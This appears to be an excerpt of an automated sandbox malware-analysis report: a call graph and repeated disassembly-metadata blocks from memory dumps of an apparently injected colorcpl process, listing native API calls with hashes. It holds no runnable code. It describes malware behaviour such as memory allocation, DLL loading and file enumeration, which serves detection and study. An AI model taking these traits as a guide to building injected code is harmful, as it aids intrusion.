98809->98802 98811->98809 98440 3227590 98441 32275f5 98440->98441 98442 322762c 98441->98442 98445 321b2a0 98441->98445 98444 322760e 98446 321b23a 98445->98446 98447 321b2ae 98445->98447 98454 3228440 98446->98454 98449 321b258 98459 32285a0 98449->98459 98451 321b267 98464 3217e90 98451->98464 98455 32284c0 98454->98455 98456 322846e 98454->98456 98468 5294340 LdrInitializeThunk 98455->98468 98456->98449 98457 32284e5 98457->98449 98460 322861d 98459->98460 98461 32285cb 98459->98461 98469 5292fb0 LdrInitializeThunk 98460->98469 98461->98451 98462 3228642 98462->98451 98465 3217ea3 98464->98465 98470 3228720 98465->98470 98467 3217ece 98467->98444 98468->98457 98469->98462 98471 32287a1 98470->98471 98473 322874e 98470->98473 98475 5292dd0 LdrInitializeThunk 98471->98475 98472 32287c6 98472->98467 98473->98467 98475->98472 98817 32287d0 98818 32287ea 98817->98818 98821 5292df0 LdrInitializeThunk 98818->98821 98819 3228812 98821->98819 98822 3228650 98823 32286e2 98822->98823 98824 322867e 98822->98824 98827 5292ee0 LdrInitializeThunk 98823->98827 98825 3228713 98827->98825 98828 3225ed0 98829 3225f2a 98828->98829 98831 3225f37 98829->98831 98832 32238c0 98829->98832 98833 322b270 NtAllocateVirtualMemory 98832->98833 98835 3223901 98833->98835 98834 3223a0e 98834->98831 98835->98834 98836 32142f0 LdrLoadDll 98835->98836 98838 3223947 98836->98838 98837 3223990 Sleep 98837->98838 98838->98834 98838->98837 98839 5292ad0 LdrInitializeThunk
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321C494
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0321C4CF
                                                                                                        • FindClose.KERNELBASE(?), ref: 0321C4DA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
                                                                                                        • Instruction ID: 2a6617d97f913c4e3f43229e48064b0ddbecbc5cc600c0f709fd50841bb63064
                                                                                                        • Opcode Fuzzy Hash: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
                                                                                                        • Instruction Fuzzy Hash: 02310379950318BBDB20EFA0CC81FFB77BCDB54700F144458B909AB080DAB0AAD48BA1
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03228FBE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction ID: 03ab5ddf136bf0ca34b46515267f9dfddd63f2dcaddfb374cc5d3735cee826cc
                                                                                                        • Opcode Fuzzy Hash: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction Fuzzy Hash: 7A31D6B5A10248AFDB14DF98D881EDEBBB9EF8C304F108119F919AB344D774A851CBA5
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03229116
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
                                                                                                        • Instruction ID: 1ac44496c1ce9326707bdde8ba872854abd27004b9a0c9605563a1d86d9360c9
                                                                                                        • Opcode Fuzzy Hash: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
                                                                                                        • Instruction Fuzzy Hash: 7C31E8B5A10248AFDB14DF98DC41EDFBBB9EF88314F108109F919AB240D774A851CFA5
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(03211B8E,?,03227E0E,00000000,00000004,00003000,?,?,?,?,?,03227E0E,03211B8E), ref: 032293EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
                                                                                                        • Instruction ID: 285fd7da74886c7759b8f0fe66304cb22d537a26a3c42d077276c6b5703afcda
                                                                                                        • Opcode Fuzzy Hash: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
                                                                                                        • Instruction Fuzzy Hash: 6C2119B5A10309AFDB10DF98DC41EEFBBB9EF88304F008109F919AB240D774A951CBA1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
                                                                                                        • Instruction ID: 49e774663c32b61ce7a7706d407ade3b45408ee7a2f023204bef4466d763f769
                                                                                                        • Opcode Fuzzy Hash: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
                                                                                                        • Instruction Fuzzy Hash: EF119E75A103187ED620EA68CC41FEBBB6CDF85714F408509F918AB280D7B5B555CBA1
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 032291F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction ID: c51bedf02424cf2c2e16034536ff356eb05e3a1e546276fc878ce14bb3d54e36
                                                                                                        • Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction Fuzzy Hash: CBE08C7A2002147BD620FA5ADC01FAB7B6CDFC5764F408015FA08AB281C6B5B92487F5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: bcb20833ae154a8e4fa72d8c79d0acab5398fd18b76cfe7d13c6560bfe088ba8
                                                                                                        • Instruction ID: 7319bb42b3a99a89246181b715967d4e8dd63428c7d1f1bc89c4b166e44756d5
                                                                                                        • Opcode Fuzzy Hash: bcb20833ae154a8e4fa72d8c79d0acab5398fd18b76cfe7d13c6560bfe088ba8
                                                                                                        • Instruction Fuzzy Hash: FE9002A3B115004341407198484440660159BE13013D5C115A1554560D865889559269
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ddcde57dcd623d1a057043a90d7d7a4bd7ba9b51fdbce03492eb8347a639ca6f
                                                                                                        • Instruction ID: d6531115a003bf6ed418c090ac013b22a0f52005666ff97611205a00bda151a6
                                                                                                        • Opcode Fuzzy Hash: ddcde57dcd623d1a057043a90d7d7a4bd7ba9b51fdbce03492eb8347a639ca6f
                                                                                                        • Instruction Fuzzy Hash: 72900273B15800139140719848C454640159BE0301B95C011E1424554D8A548A565361
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8953181ee0cf73f7a5aac668209e83bb2ae7aa07ca73d55b07dedd5c78ca61ed
                                                                                                        • Instruction ID: f331ca3043b59cc3975a95ae0547a27d4021d4dbaf7523386742e44f8acc6aee
                                                                                                        • Opcode Fuzzy Hash: 8953181ee0cf73f7a5aac668209e83bb2ae7aa07ca73d55b07dedd5c78ca61ed
                                                                                                        • Instruction Fuzzy Hash: C890047371140003D14071DC545C7074015DFF1301FD5D011F1414554DDD55CD575333
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: aaa32ba63d38e6066c673ca549774a3c9ab4619884a2dcc5d7f07ff85d8ce244
                                                                                                        • Instruction ID: a29de0d69c94a22c610617675ca5d5bbdccda1a084b7de748ddd7842d0c3b21c
                                                                                                        • Opcode Fuzzy Hash: aaa32ba63d38e6066c673ca549774a3c9ab4619884a2dcc5d7f07ff85d8ce244
                                                                                                        • Instruction Fuzzy Hash: 1F90026B72340003D1807198544860A00158BD1302FD5D415A1015558DC95589695321
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 45bc8b907d262d850291293e6d9f4c5064eab781bce0438af1ef96b69099bda1
                                                                                                        • Instruction ID: 20f47d4795d4d93d617186cbb9ff75ef4c358620091e7958ed2410acc071e0c3
                                                                                                        • Opcode Fuzzy Hash: 45bc8b907d262d850291293e6d9f4c5064eab781bce0438af1ef96b69099bda1
                                                                                                        • Instruction Fuzzy Hash: A290027371140413D1117198454470700198BD0341FD5C412A1424558E96968A52A121
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: fe14c7d0114e4aa6cf3d15a29cebc620ceab34844873c9ada5ec59a39dd02c07
                                                                                                        • Instruction ID: 81dcba323e7d3de7089026af1b29ea56d986b650a60fb327487c9c89fe733f92
                                                                                                        • Opcode Fuzzy Hash: fe14c7d0114e4aa6cf3d15a29cebc620ceab34844873c9ada5ec59a39dd02c07
                                                                                                        • Instruction Fuzzy Hash: BE900263752441535545B198444450740169BE03417D5C012A2414950D85669956D621
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 70375bad3d0b422a4dc9044be692811238ad2923202c70a2a3507042921350d5
                                                                                                        • Instruction ID: c3b754580bbb896c89c11942c34cba938c4a5bc841f757837ec56a1465c8399b
                                                                                                        • Opcode Fuzzy Hash: 70375bad3d0b422a4dc9044be692811238ad2923202c70a2a3507042921350d5
                                                                                                        • Instruction Fuzzy Hash: CC90027371140843D10071984444B4600158BE0301F95C016A1124654E8655C9517521
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e20c1eb2015937b0ba6a230a1caec26d69c75740aebeb17f8cb902ba6a9cbe87
                                                                                                        • Instruction ID: dd92ac7c6b760acc58dd5c165821f35162d2d0d9c60f58bd7967d9187ca865fd
                                                                                                        • Opcode Fuzzy Hash: e20c1eb2015937b0ba6a230a1caec26d69c75740aebeb17f8cb902ba6a9cbe87
                                                                                                        • Instruction Fuzzy Hash: 1390027371148803D1107198844474A00158BD0301F99C411A5424658E86D589917121
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e67250c5afd0ed0b7ff3967ceaf6e199e4c4195989658f0281fb4c16a6570bd6
                                                                                                        • Instruction ID: 72389c5518d4c5d3c0650031c44028314f8c7855a84a5304b9a0173f743b3820
                                                                                                        • Opcode Fuzzy Hash: e67250c5afd0ed0b7ff3967ceaf6e199e4c4195989658f0281fb4c16a6570bd6
                                                                                                        • Instruction Fuzzy Hash: EB90027371140403D10075D8544864600158BE0301F95D011A6024555FC6A589916131
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 27c727d00a200404d8fd8bf819881ee369947904ba26fe1cf6810e2a4e038440
                                                                                                        • Instruction ID: 26b2301ed75060a7263f98b5e105e522843ffb8ad7e5f4f575b30bb0736d3aca
                                                                                                        • Opcode Fuzzy Hash: 27c727d00a200404d8fd8bf819881ee369947904ba26fe1cf6810e2a4e038440
                                                                                                        • Instruction Fuzzy Hash: 849002A375140443D10071984454B060015CBE1301F95C015E2064554E8659CD526126
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c78edab4fb6c333d0e65a8d9d9e419c7af476ca36e7b28c668e27b089d3ebf8e
                                                                                                        • Instruction ID: 7fafe30f986b974291198c25a0e44a806a27d40bc695f87fa4b10d99d14ffa36
                                                                                                        • Opcode Fuzzy Hash: c78edab4fb6c333d0e65a8d9d9e419c7af476ca36e7b28c668e27b089d3ebf8e
                                                                                                        • Instruction Fuzzy Hash: FF900263B1140043414071A888849064015AFE1311795C121A1998550E859989655665
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 40c2c815815cde6c89d0a0aab245bf88cb60a60510752552db06520f83e93fb4
                                                                                                        • Instruction ID: b08bf1843644d19d57985c8687c82c015302ba913d11ed31dc50acd41de4770c
                                                                                                        • Opcode Fuzzy Hash: 40c2c815815cde6c89d0a0aab245bf88cb60a60510752552db06520f83e93fb4
                                                                                                        • Instruction Fuzzy Hash: A1900263721C0043D20075A84C54B0700158BD0303F95C115A1154554DC95589615521
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f4dac31669594d4fafb0a43203f01947f3b8ffb91ae0ef3976a311ece2a2484b
                                                                                                        • Instruction ID: 5cc95e719dcd4ab4b51edb9ad5c626638c396141927f79ddd0e73d161a1c304f
                                                                                                        • Opcode Fuzzy Hash: f4dac31669594d4fafb0a43203f01947f3b8ffb91ae0ef3976a311ece2a2484b
                                                                                                        • Instruction Fuzzy Hash: 4C900263B1140503D10171984444616001A8BD0341FD5C022A2024555FCA658A92A131
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2b5feadc247bcb51ae7c970b62facbb908983eba305999c15f561ad1d814de33
                                                                                                        • Instruction ID: c09eee09b826a3e26d85cc7a752af0ff1733623dfe794f58068ae2b28b28c42a
                                                                                                        • Opcode Fuzzy Hash: 2b5feadc247bcb51ae7c970b62facbb908983eba305999c15f561ad1d814de33
                                                                                                        • Instruction Fuzzy Hash: 769002A371180403D1407598484460700158BD0302F95C011A3064555F8A698D516135
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b651777083eec65b99150a4993149aebf0f42a2712e8451c42d9562db77562dd
                                                                                                        • Instruction ID: 98b36000f45a0b047e8a7b748430a2141ca9e7b6d2dc597a6e2e3b3d2c4122b0
                                                                                                        • Opcode Fuzzy Hash: b651777083eec65b99150a4993149aebf0f42a2712e8451c42d9562db77562dd
                                                                                                        • Instruction Fuzzy Hash: AD9002A371240003410571984454616401A8BE0301B95C021E2014590EC56589916125
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 48db90c7362880a693ac24df9fd31842578073874141f80fcb4fd5e03c31d55e
                                                                                                        • Instruction ID: 3c57b108cc2d68ac26b3fa9cc8f5a952d2cf647b327ca2e50b5d22151d53c458
                                                                                                        • Opcode Fuzzy Hash: 48db90c7362880a693ac24df9fd31842578073874141f80fcb4fd5e03c31d55e
                                                                                                        • Instruction Fuzzy Hash: 93900273B1540803D1507198445474600158BD0301F95C011A1024654E87958B5576A1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: cd242f51679b7bb80859cb0dd4f49ea48c13902296952a2520853b29663cbcd6
                                                                                                        • Instruction ID: 056b5b3143ba5673ce77a98cb90460f118d503b30e1d628d46fe46025e86f457
                                                                                                        • Opcode Fuzzy Hash: cd242f51679b7bb80859cb0dd4f49ea48c13902296952a2520853b29663cbcd6
                                                                                                        • Instruction Fuzzy Hash: 3690027371544843D14071984444A4600258BD0305F95C011A1064694E96658E55B661
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
